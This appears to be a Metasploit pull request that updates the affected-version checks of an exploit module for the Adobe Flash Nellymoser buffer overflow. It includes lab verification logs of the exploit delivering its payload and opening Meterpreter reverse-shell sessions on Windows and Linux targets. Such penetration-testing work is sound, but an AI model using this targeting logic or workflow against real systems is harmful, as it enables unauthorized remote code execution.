### PR TITLE
Add CVE-2015-3043 information

### DIFF
--- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
+++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
@@ -32,7 +32,9 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'          =>
         [
+          ['CVE', '2015-3043'],
           ['CVE', '2015-3113'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
           ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
           ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
           ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
@@ -67,8 +69,9 @@ class Metasploit3 < Msf::Exploit::Remote
             case target.name
             when 'Windows'
               return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
+              return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
             when 'Linux'
-              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466')
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
             end
 
             false


### PR DESCRIPTION
As the people at trend micro pointed CVE-2015-3113 is a regression of CVE-2014-3043 due to a patch change. So I'm updating this module to have up to date information about versions affected. 

http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/

I built the flv for msf by myself, so I'm not sure about the flv's used by malware in the wild. But the one in msf works with the versions affected for CVE-2014-3043. Stops working for the versions patched by CVE-2014-3043 (Flash 17.0.0.169 and 11.2.202.457), and then works again until the patches for CVE-2015-3113 (18.0.0.194 and 11.2.202.457).

So basically, this patch adds more accreted version information. In case you'd like to double check, keep reading :)
## Verification
- [x] Proceed to test like #5642, Flash Flash 18.0.0.160 (windows) and  11.2.202.466 (linux) should allow to get sessions (like in #5462) 
- [x] Use Adobe Flash 17.0.0.134 on a Windows Target, verify which you get a session

```
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Gathering target information.
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Sending HTML response.
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Request: /fIPu9opNv1wubE/JabTEV/
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Sending HTML...
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Request: /fIPu9opNv1wubE/JabTEV/JLAKm.swf
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Sending SWF...
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Request: /fIPu9opNv1wubE/JabTEV/poc2.flv
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Sending FLV...
[*] Sending stage (884782 bytes) to 172.16.158.133
msf exploit(adobe_flash_nellymoser_bof) > se[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.133:49201) at 2015-07-01 19:39:14 -0500
ssions -i 2
[*] Starting interaction with 2...

meterpreter > getpid
pCurrent pid: 1172
smeterpreter > ps -S 1172


Process list
============

 PID   Name                              Arch  Session  User                          Path
 ---   ----                              ----  -------  ----                          ----
 1172  FlashPlayerPlugin_17_0_0_134.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_17_0_0_134.exe
```
- [x] Use Flash 17.0.0.188 on a Windows Target, verify which you get a session

```
[*] 172.16.158.133   adobe_flash_nellymoser_bof - Sending FLV...
[*] Sending stage (884782 bytes) to 172.16.158.133
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.133:49249) at 2015-07-01 19:44:22 -0500

msf exploit(adobe_flash_nellymoser_bof) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getpid
Current pid: 2808
meterpreter > ps -S 2808


Process list
============

 PID   Name                              Arch  Session  User                          Path
 ---   ----                              ----  -------  ----                          ----
 2808  FlashPlayerPlugin_17_0_0_188.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_17_0_0_188.exe


meterpreter >
```
- [x] Use Flash 11.2.202.451 on a Linux target, verify which you get a session

```
[*] 172.16.158.134   adobe_flash_nellymoser_bof - Sending FLV...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
msf exploit(adobe_flash_nellymoser_bof) > [*] Sending stage (1495598 bytes) to 172.16.158.134
[*] Meterpreter session 5 opened (172.16.158.1:4444 -> 172.16.158.134:58934) at 2015-07-01 19:53:55 -0500

msf exploit(adobe_flash_nellymoser_bof) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getpid
Current pid: 21240
meterpreter > ps -S 21240


Process list
============

 PID    Name                         Arch  Session  User        Path
 ---    ----                         ----  -------  ----        ----
 21240  plugin-containe              x86   0        juan        ELF


meterpreter >
```
- [x] In case you'd like to verify it's a regression for CVE-2015-3043, Flash 17.0.0.169 (windows) and 11.2.202.457 (linux) shouldn't allow to get sessions. Anyway if BES is detecting the version correctly (it detects correctly the ActiveX version of flash) it shouldn't send the exploit for these versions.
